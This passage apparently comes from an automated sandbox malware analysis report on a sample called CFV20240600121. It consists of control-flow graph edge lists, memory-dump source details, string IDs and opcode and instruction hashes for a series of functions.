675->673 677 77d9b9f-77d9baa 684 77d9bb5-77d9bee 677->684 679->665 700 77da079 680->700 701 77da051-77da05d 680->701 681 77d9ea7-77d9eba 681->665 683 77da0a1-77da0a9 684->639 698 77d9f4b-77d9f57 695->698 699 77d9f73 695->699 702 77d9f59-77d9f5f 698->702 703 77d9f61-77d9f67 698->703 707 77d9f79-77d9f8e 699->707 708 77da07f-77da094 700->708 705 77da05f-77da065 701->705 706 77da067-77da06d 701->706 709 77d9f71 702->709 703->709 710 77da077 705->710 706->710 709->707 710->708 714 77d9e78-77d9e99 714->665 715->609 716->609 717->649 718->649 720->661 721->661 722->677 723->677 727->714 728->714 729->681 730->681 731->683 732->683
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q$$]q$$]q$a"9
                                        • API String ID: 0-3129253312
                                        • Opcode ID: 896177a19ecea1ff50f8f312fd57440c79fd576b0ad1bf9fb57d02c103f25543
                                        • Instruction ID: 1a28745a39d1fbc9c41d9897cc087c16939dec69323e97f74f45035f2ad920b4
                                        • Opcode Fuzzy Hash: 896177a19ecea1ff50f8f312fd57440c79fd576b0ad1bf9fb57d02c103f25543
                                        • Instruction Fuzzy Hash: C522F5B4E05219CFDB58CFA9D98479DBBB2FB89340F10D4AAD50AA7258D7309E81CF14
                                        Function 077D4B48 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 734 77d4b48-77d4b56 735 77d4b5f-77d4b62 734->735 736 77d4b58-77d4b5a 734->736 738 77d4b63-77d4b64 735->738 739 77d4b6b-77d4b70 735->739 737 77d4b5c-77d4b5e 736->737 736->738 737->735 740 77d4b67-77d4b6a 737->740 738->740 741 77d4b73-77d4b7a 739->741 740->739 740->741 742 77d4b7c-77d4b7e 741->742 743 77d4b83-77d4b84 741->743 744 77d4b87-77d4b8a 742->744 745 77d4b80-77d4b82 742->745 746 77d4bcd-77d4bd0 743->746 747 77d4b86 743->747 749 77d4b8b-77d4b8c 744->749 750 77d4b93-77d4b96 744->750 745->743 745->749 751 77d4bd4-77d4bd9 746->751 747->744 748 77d4b8f-77d4b90 747->748 748->750 749->751 752 77d4b8e 749->752 754 77d4b9f-77d4ba2 750->754 755 77d4b97-77d4b98 750->755 756 77d4bdb-77d4bf1 751->756 752->748 752->755 757 77d4bab-77d4bac 754->757 758 77d4ba4-77d4ba6 754->758 755->756 759 77d4bf3-77d4bfb 756->759 757->759 762 77d4bae 757->762 760 77d4baf-77d4bb0 758->760 761 77d4ba8-77d4baa 758->761 763 77d4bfd-77d4c00 759->763 764 77d4c02-77d4c5c 759->764 765 77d4bb3-77d4bb4 760->765 761->757 761->765 762->760 766 77d4bb7-77d4bba 762->766 763->764 772 77d4c5f 764->772 765->766 767 77d4bbb-77d4bc0 766->767 768 77d4bc3-77d4bc8 766->768 767->768 768->746 773 77d4c66-77d4c82 772->773 774 77d4c8b-77d4c8c 773->774 775 77d4c84 773->775 777 77d4ddf-77d4e4f 774->777 783 77d4c91-77d4cca 774->783 775->772 776 77d4ccc-77d4cfa 775->776 775->777 778 77d4cff-77d4d3f 775->778 779 77d4d8e-77d4d92 775->779 780 77d4dbe-77d4dda 775->780 781 77d4d44-77d4d51 775->781 782 77d4d77-77d4d89 775->782 775->783 776->773 799 77d4e51 call 77d661b 777->799 800 77d4e51 call 77d6ca7 777->800 801 77d4e51 call 77d6100 777->801 802 77d4e51 call 77d6762 777->802 778->773 784 77d4da5-77d4dac 779->784 785 77d4d94-77d4da3 779->785 780->773 795 77d4d5a-77d4d72 781->795 782->773 783->773 787 77d4db3-77d4db9 784->787 785->787 787->773 795->773 798 77d4e57-77d4e61 799->798 800->798 801->798 802->798
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$f
                                        • API String ID: 0-3013327057
                                        • Opcode ID: a1846580a42fa5c3c3dfffd7320db7526ec0eff90168ab730e6e470619a7bd55
                                        • Instruction ID: fd24493f58c1a3b25bdfcb7f2b58ffe91df8a25785379bfe364ba2c271cc774d
                                        • Opcode Fuzzy Hash: a1846580a42fa5c3c3dfffd7320db7526ec0eff90168ab730e6e470619a7bd55
                                        • Instruction Fuzzy Hash: E8B15BB5E056898FCB04CFE9D884AEDBBF2FF89350F14806AD815AB255D7309942CF94
                                        Function 077D4B9B Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 913 77d4b9b-77d4b9e 915 77d4ba7-77d4baa 913->915 916 77d4ba0-77d4ba2 913->916 919 77d4bac 915->919 920 77d4bb3-77d4bb4 915->920 917 77d4bab-77d4bac 916->917 918 77d4ba4-77d4ba6 916->918 921 77d4bae 917->921 922 77d4bf3-77d4bfb 917->922 923 77d4baf-77d4bb0 918->923 924 77d4ba8-77d4baa 918->924 919->921 919->922 925 77d4bb7-77d4bba 920->925 921->923 921->925 926 77d4bfd-77d4c00 922->926 927 77d4c02-77d4c5c 922->927 923->920 924->917 924->920 928 77d4bbb-77d4bc0 925->928 929 77d4bc3-77d4bf1 925->929 926->927 937 77d4c5f 927->937 928->929 929->922 938 77d4c66-77d4c82 937->938 939 77d4c8b-77d4c8c 938->939 940 77d4c84 938->940 942 77d4ddf-77d4e4f 939->942 948 77d4c91-77d4cca 939->948 940->937 941 77d4ccc-77d4cfa 940->941 940->942 943 77d4cff-77d4d3f 940->943 944 77d4d8e-77d4d92 940->944 945 77d4dbe-77d4dda 940->945 946 77d4d44-77d4d51 940->946 947 77d4d77-77d4d89 940->947 940->948 941->938 964 77d4e51 call 77d661b 942->964 965 77d4e51 call 77d6ca7 942->965 966 77d4e51 call 77d6100 942->966 967 77d4e51 call 77d6762 942->967 943->938 949 77d4da5-77d4dac 944->949 950 77d4d94-77d4da3 944->950 945->938 960 77d4d5a-77d4d72 946->960 947->938 948->938 952 77d4db3-77d4db9 949->952 950->952 952->938 960->938 963 77d4e57-77d4e61 964->963 965->963 966->963 967->963
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 28636147ac6e4d388c34c3407a9b9f377d6065a1726fb77936102639e3289caa
                                        • Instruction ID: 060fabec8b8c0f73d398a910895d4c22e38d30feb55b139e334aba9a69af607c
                                        • Opcode Fuzzy Hash: 28636147ac6e4d388c34c3407a9b9f377d6065a1726fb77936102639e3289caa
                                        • Instruction Fuzzy Hash: 8991F5B5E052498FCB08CFA9C984ADDFBF2FF89310F14802AD919AB264D7349906CF54
                                        Function 0A130DB0 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 968 a130db0-a130dd5 969 a130dd7 968->969 970 a130ddc-a130e0d 968->970 969->970 971 a130e0e 970->971 972 a130e15-a130e31 971->972 973 a130e33 972->973 974 a130e3a-a130e3b 972->974 973->971 973->974 975 a130eb2-a130ec5 973->975 976 a130f31-a130f3a 973->976 977 a130f76-a130f88 973->977 978 a130f16-a130f2c 973->978 979 a130e59-a130e6b 973->979 980 a131058-a131073 call a130364 973->980 981 a130f3f-a130f43 973->981 982 a13109e-a1310a7 973->982 983 a130ee2-a130f11 973->983 984 a130fe0-a130fe9 973->984 985 a130e40-a130e57 973->985 986 a130e86-a130ead 973->986 987 a131025-a131053 973->987 988 a130eca-a130edd 973->988 989 a130fa9-a130fad 973->989 990 a131008-a131020 973->990 991 a130fee-a131003 973->991 992 a130e6d-a130e84 973->992 993 a130f8d-a130fa4 973->993 974->982 975->972 976->972 977->972 978->972 979->972 1004 a131079-a131099 980->1004 996 a130f56-a130f5d 981->996 997 a130f45-a130f54 981->997 983->972 984->972 985->972 986->972 987->972 988->972 994 a130fc0-a130fc7 989->994 995 a130faf-a130fbe 989->995 990->972 991->972 992->972 993->972 998 a130fce-a130fdb 994->998 995->998 1003 a130f64-a130f71 996->1003 997->1003 998->972 1003->972 1004->972
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: IJfl$IJfl
                                        • API String ID: 0-1673969182
                                        • Opcode ID: c638b1b6107c3f48742b4ed61224e217b715776c94c2369de58539bac516d0e3
                                        • Instruction ID: 49625f93f4840a59db323c33a5314a61034c38d1212301c97cdcfe2288e65870
                                        • Opcode Fuzzy Hash: c638b1b6107c3f48742b4ed61224e217b715776c94c2369de58539bac516d0e3
                                        • Instruction Fuzzy Hash: 5091E272E0520DEFCB18CFA6E5845EEFBF2AF89310F14942AE425AB224D7309556CF14
                                        Function 077D9CCC Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1006 77d9ccc-77d9cd9 1010 77d9d3c 1006->1010 1011 77d9cdb 1006->1011 1012 77d9d57 1010->1012 1013 77d9ce2-77d9cfe 1011->1013 1016 77d9d5e-77d9d7a 1012->1016 1014 77d9d07-77d9d08 1013->1014 1015 77d9d00 1013->1015 1014->1010 1017 77d9d0a-77d9d25 1014->1017 1015->1010 1015->1011 1015->1012 1015->1017 1018 77d9ebf-77d9f36 call 77de058 1015->1018 1019 77d9e9e 1015->1019 1020 77da099 1015->1020 1021 77d9fc5-77d9fd3 1015->1021 1022 77d9d27-77d9d3a 1015->1022 1023 77d9f93-77d9f99 call 77df5d8 1015->1023 1024 77d9d92-77d9e6f call a130db0 call a1319b0 call 77de058 1015->1024 1025 77d9d8c-77d9d8d 1016->1025 1026 77d9d7c 1016->1026 1017->1013 1043 77d9f3c-77d9f49 1018->1043 1069 77d9ea1 call a1325d8 1019->1069 1070 77d9ea1 call a1325c8 1019->1070 1072 77da09b call a13fa98 1020->1072 1073 77da09b call a13fa88 1020->1073 1032 77d9fde-77da04f 1021->1032 1022->1013 1029 77d9f9f-77d9fc0 1023->1029 1065 77d9e72 call 77dae00 1024->1065 1066 77d9e72 call 77dadf0 1024->1066 1025->1020 1025->1024 1026->1012 1026->1018 1026->1019 1026->1020 1026->1021 1026->1023 1026->1024 1028 77d9ea7-77d9eba 1028->1016 1029->1016 1031 77da0a1-77da0a9 1048 77da079 1032->1048 1049 77da051-77da05d 1032->1049 1046 77d9f4b-77d9f57 1043->1046 1047 77d9f73 1043->1047 1050 77d9f59-77d9f5f 1046->1050 1051 77d9f61-77d9f67 1046->1051 1054 77d9f79-77d9f8e 1047->1054 1055 77da07f-77da094 1048->1055 1052 77da05f-77da065 1049->1052 1053 77da067-77da06d 1049->1053 1057 77d9f71 1050->1057 1051->1057 1058 77da077 1052->1058 1053->1058 1057->1054 1058->1055 1062 77d9e78-77d9e99 1062->1016 1065->1062 1066->1062 1069->1028 1070->1028 1072->1031 1073->1031
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: c525d08dd5c12a7a95316ae67ba7275d5c778c6190587e26db52a0a3c3e553c4
                                        • Instruction ID: 4a8e79a662f5d6c9c36a7247a59da6cf2f73ae424c0662fd1091d23868a48166
                                        • Opcode Fuzzy Hash: c525d08dd5c12a7a95316ae67ba7275d5c778c6190587e26db52a0a3c3e553c4
                                        • Instruction Fuzzy Hash: DEA1E474E00219CFDB64DFA5C958B9DBBB2FB89340F2084AAD50AA7758D7309E81CF14
                                        Function 077D9CB7 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1074 77d9cb7-77d9cd9 1076 77d9d3c 1074->1076 1077 77d9cdb 1074->1077 1078 77d9d57 1076->1078 1079 77d9ce2-77d9cfe 1077->1079 1082 77d9d5e-77d9d7a 1078->1082 1080 77d9d07-77d9d08 1079->1080 1081 77d9d00 1079->1081 1080->1076 1083 77d9d0a-77d9d25 1080->1083 1081->1076 1081->1077 1081->1078 1081->1083 1084 77d9ebf-77d9f36 call 77de058 1081->1084 1085 77d9e9e 1081->1085 1086 77da099 1081->1086 1087 77d9fc5-77d9fd3 1081->1087 1088 77d9d27-77d9d3a 1081->1088 1089 77d9f93-77d9f99 call 77df5d8 1081->1089 1090 77d9d92-77d9e6f call a130db0 call a1319b0 call 77de058 1081->1090 1091 77d9d8c-77d9d8d 1082->1091 1092 77d9d7c 1082->1092 1083->1079 1109 77d9f3c-77d9f49 1084->1109 1134 77d9ea1 call a1325d8 1085->1134 1135 77d9ea1 call a1325c8 1085->1135 1137 77da09b call a13fa98 1086->1137 1138 77da09b call a13fa88 1086->1138 1098 77d9fde-77da04f 1087->1098 1088->1079 1095 77d9f9f-77d9fc0 1089->1095 1130 77d9e72 call 77dae00 1090->1130 1131 77d9e72 call 77dadf0 1090->1131 1091->1086 1091->1090 1092->1078 1092->1084 1092->1085 1092->1086 1092->1087 1092->1089 1092->1090 1094 77d9ea7-77d9eba 1094->1082 1095->1082 1097 77da0a1-77da0a9 1114 77da079 1098->1114 1115 77da051-77da05d 1098->1115 1112 77d9f4b-77d9f57 1109->1112 1113 77d9f73 1109->1113 1116 77d9f59-77d9f5f 1112->1116 1117 77d9f61-77d9f67 1112->1117 1120 77d9f79-77d9f8e 1113->1120 1121 77da07f-77da094 1114->1121 1118 77da05f-77da065 1115->1118 1119 77da067-77da06d 1115->1119 1123 77d9f71 1116->1123 1117->1123 1124 77da077 1118->1124 1119->1124 1123->1120 1124->1121 1128 77d9e78-77d9e99 1128->1082 1130->1128 1131->1128 1134->1094 1135->1094 1137->1097 1138->1097
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 6639cba4d9a4a46221b9c8bc4a7a3a7906559bbaeb7514685f7589b4ffc043f0
                                        • Instruction ID: 13f38ee538669846a07a83486c59f0660a304091f667639961c33a849c4823d6
                                        • Opcode Fuzzy Hash: 6639cba4d9a4a46221b9c8bc4a7a3a7906559bbaeb7514685f7589b4ffc043f0
                                        • Instruction Fuzzy Hash: F4A1D574E00219CFDB64DFA5D954B9DBBB2FB89340F2084AAD50AA7758D7309E81CF14
                                        Function 077D4BD8 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1191 77d4bd8-77d4bfb 1194 77d4bfd-77d4c00 1191->1194 1195 77d4c02-77d4c5c 1191->1195 1194->1195 1199 77d4c5f 1195->1199 1200 77d4c66-77d4c82 1199->1200 1201 77d4c8b-77d4c8c 1200->1201 1202 77d4c84 1200->1202 1204 77d4ddf-77d4e4f 1201->1204 1210 77d4c91-77d4cca 1201->1210 1202->1199 1203 77d4ccc-77d4cfa 1202->1203 1202->1204 1205 77d4cff-77d4d3f 1202->1205 1206 77d4d8e-77d4d92 1202->1206 1207 77d4dbe-77d4dda 1202->1207 1208 77d4d44-77d4d51 1202->1208 1209 77d4d77-77d4d89 1202->1209 1202->1210 1203->1200 1226 77d4e51 call 77d661b 1204->1226 1227 77d4e51 call 77d6ca7 1204->1227 1228 77d4e51 call 77d6100 1204->1228 1229 77d4e51 call 77d6762 1204->1229 1205->1200 1211 77d4da5-77d4dac 1206->1211 1212 77d4d94-77d4da3 1206->1212 1207->1200 1222 77d4d5a-77d4d72 1208->1222 1209->1200 1210->1200 1214 77d4db3-77d4db9 1211->1214 1212->1214 1214->1200 1222->1200 1225 77d4e57-77d4e61 1226->1225 1227->1225 1228->1225 1229->1225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: e4fc8262052bf3f19116da948b1324206d104360699f627cd0b5d364dd3e219e
                                        • Instruction ID: c52aa54688802381fb7a074a2e6f0feb707b6c827476aae5dbe01342c0067a4e
                                        • Opcode Fuzzy Hash: e4fc8262052bf3f19116da948b1324206d104360699f627cd0b5d364dd3e219e
                                        • Instruction Fuzzy Hash: 7A81C3B4E012199FDB08CFA9C984ADEFBB2FF89300F14842AD919AB364D7345905CF54
                                        Function 077D9D3F Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1230 77d9d3f-77d9d54 1232 77d9d57 1230->1232 1233 77d9d5e-77d9d7a 1232->1233 1234 77d9d8c-77d9d8d 1233->1234 1235 77d9d7c 1233->1235 1238 77da099 1234->1238 1241 77d9d92-77d9e6f call a130db0 call a1319b0 call 77de058 1234->1241 1235->1232 1236 77d9ebf-77d9f36 call 77de058 1235->1236 1237 77d9e9e 1235->1237 1235->1238 1239 77d9fc5-77d9fd3 1235->1239 1240 77d9f93-77d9f99 call 77df5d8 1235->1240 1235->1241 1257 77d9f3c-77d9f49 1236->1257 1277 77d9ea1 call a1325d8 1237->1277 1278 77d9ea1 call a1325c8 1237->1278 1280 77da09b call a13fa98 1238->1280 1281 77da09b call a13fa88 1238->1281 1247 77d9fde-77da04f 1239->1247 1244 77d9f9f-77d9fc0 1240->1244 1284 77d9e72 call 77dae00 1241->1284 1285 77d9e72 call 77dadf0 1241->1285 1243 77d9ea7-77d9eba 1243->1233 1244->1233 1246 77da0a1-77da0a9 1262 77da079 1247->1262 1263 77da051-77da05d 1247->1263 1260 77d9f4b-77d9f57 1257->1260 1261 77d9f73 1257->1261 1264 77d9f59-77d9f5f 1260->1264 1265 77d9f61-77d9f67 1260->1265 1268 77d9f79-77d9f8e 1261->1268 1269 77da07f-77da094 1262->1269 1266 77da05f-77da065 1263->1266 1267 77da067-77da06d 1263->1267 1271 77d9f71 1264->1271 1265->1271 1272 77da077 1266->1272 1267->1272 1271->1268 1272->1269 1276 77d9e78-77d9e99 1276->1233 1277->1243 1278->1243 1280->1246 1281->1246 1284->1276 1285->1276
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 698f6865981dab71d8089261c4a7d6823d9ed88379d31155744bdd8fb5f9783e
                                        • Instruction ID: 57a59596377a03bddedaa3a2f48c4246fb486e12028a5c529dabe4f08eb1cca7
                                        • Opcode Fuzzy Hash: 698f6865981dab71d8089261c4a7d6823d9ed88379d31155744bdd8fb5f9783e
                                        • Instruction Fuzzy Hash: 0291A074E00219CFDB64DFA5D954B9DBBB2FB89300F1085AAD90AA7758DB309E81CF10
                                        Function 058071B0 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Pp]q
                                        • API String ID: 0-2528107101
                                        • Opcode ID: ac7e26a01412c03e91565142cc1a7920d12e63d98838b21fc4a7a5640db498aa
                                        • Instruction ID: d39b8475ab8cbaf4207b133106a32d04cff6656ab0c8a36be348af3b57fd9dd9
                                        • Opcode Fuzzy Hash: ac7e26a01412c03e91565142cc1a7920d12e63d98838b21fc4a7a5640db498aa
                                        • Instruction Fuzzy Hash: 0B52C234A11659CFDB54DF68C894B99B7B2FF89300F1196E9D509AB3A0DB30AE85CF40
                                        Function 058071A0 Relevance: 1.8, Strings: 1, Instructions: 566COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Pp]q
                                        • API String ID: 0-2528107101
                                        • Opcode ID: 075c42fd6129bbf690650d4c1ac5a12913f6a5f5a86fcf9ac668ebfabf2f448f
                                        • Instruction ID: 3bfdada9f602e53ba7dfb81bc1364fc42b4c7615215f794f837b7cf05d519fd0
                                        • Opcode Fuzzy Hash: 075c42fd6129bbf690650d4c1ac5a12913f6a5f5a86fcf9ac668ebfabf2f448f
                                        • Instruction Fuzzy Hash: 0542B134A11619CFDB54DF68C894B99B7B2FF89300F1196E9D509AB3A0DB70AE85CF40
                                        Function 0A1319B0 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =x
                                        • API String ID: 0-1503528311
                                        • Opcode ID: 1b4509088620e11fda9e4f94ce67dcdc3f1ad1dbeda5a81c2da2cf4485c4cdfa
                                        • Instruction ID: 2b29c5d12fb11bd46d738f3d85296d65612e5747cb7468f44dc86d5f4a90747a
                                        • Opcode Fuzzy Hash: 1b4509088620e11fda9e4f94ce67dcdc3f1ad1dbeda5a81c2da2cf4485c4cdfa
                                        • Instruction Fuzzy Hash: A3A10671D05619EFDF28CFA6C98069EFBB2FF88301F64952AD419A7254DB749902CF40
                                        Function 0DC30998 Relevance: .6, Instructions: 619COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7712dffb18a73de64f3968626a14c83ba9c23fce713136e31d31e20dab3866f5
                                        • Instruction ID: cd456ba80ee74a9425b7c18056325b230cafcacf172a22f71199673510682ffe
                                        • Opcode Fuzzy Hash: 7712dffb18a73de64f3968626a14c83ba9c23fce713136e31d31e20dab3866f5
                                        • Instruction Fuzzy Hash: 0B327B32B012088FDB19DF69C554BAEB7FAAF89700F248469E549DB3A1CB35ED01CB51
                                        Function 077D0818 Relevance: .5, Instructions: 493COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 195f52297059263b38dacd7b7c7f815f6b24ff204e41addce01c7aa751f5c972
                                        • Instruction ID: b22995c665c98fc7135e0ffe3b0d1ec79a24dcc7868cec563a2e0fb8e41de6a1
                                        • Opcode Fuzzy Hash: 195f52297059263b38dacd7b7c7f815f6b24ff204e41addce01c7aa751f5c972
                                        • Instruction Fuzzy Hash: 8A225C70A10219CFCB14DF68D884A9DBBB6FF89310F55C5A9E449AB225DB30ED85CF90
                                        Function 077D6F70 Relevance: .4, Instructions: 419COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2537bae66fdaa12db3265a89fc8e60bac40b9f83dc842e20d6d635123139427
                                        • Instruction ID: b2474e67d57de6f5da08473eb63b15726003af9533627efc3be40dfc5f8b6ed4
                                        • Opcode Fuzzy Hash: f2537bae66fdaa12db3265a89fc8e60bac40b9f83dc842e20d6d635123139427
                                        • Instruction Fuzzy Hash: BAF19DB591464ACFCB08DFA5D8844EEBBB2FF89390F14C156D411AB256D731AA82CFD0
                                        Function 077D7078 Relevance: .3, Instructions: 290COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 925d8612377ff11f726028c3ce57ab652467df7f65dbf162aa38e7f55145b38a
                                        • Instruction ID: 460a23e82d489a4a1ab9559f01f8847327ccda13b3f73adf7e757a8a931a1b07
                                        • Opcode Fuzzy Hash: 925d8612377ff11f726028c3ce57ab652467df7f65dbf162aa38e7f55145b38a
                                        • Instruction Fuzzy Hash: 70D13BB4E1520ADFCB08CF99C8808AEFBB2FF89340F14D555D415AB259D734AA82CF90
                                        Function 077DAEB3 Relevance: .2, Instructions: 239COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d75ee0d2f9546e0b75f5deb17e0790d4a4ff7083e8070a796d70e752822fa81
                                        • Instruction ID: 858ecb26deaba886859340c1bef2f7ee0ffb1f9abe9444f03451af006a0c32b9
                                        • Opcode Fuzzy Hash: 2d75ee0d2f9546e0b75f5deb17e0790d4a4ff7083e8070a796d70e752822fa81
                                        • Instruction Fuzzy Hash: 5EB10CB4E112199FCB14CFA9C5809ADFBB2BF89341F24C5AAD418A7356D7309E81CF61
                                        Function 077DA2A3 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0e970885cdff3631098343cf4ce2acf34cd783f816bcef1ade9ca8999407a23
                                        • Instruction ID: f5d0ac5cecc6b69fc3453512dd8709c1453aefe2522e653a7c4a566768cdc64a
                                        • Opcode Fuzzy Hash: a0e970885cdff3631098343cf4ce2acf34cd783f816bcef1ade9ca8999407a23
                                        • Instruction Fuzzy Hash: C64164B4E16209DFCB04CFA6D5806EEBBB2FF89240F11D56AC011B7254E7389A41CF61
                                        Function 077D6100 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2587bcff07fb49bdb767731d11fbb22a564235d274d377eba8787985feacf908
                                        • Instruction ID: 826e66783698fd9df8415a32dc07ced2424d9ea59fd525f34434c3356cdd1325
                                        • Opcode Fuzzy Hash: 2587bcff07fb49bdb767731d11fbb22a564235d274d377eba8787985feacf908
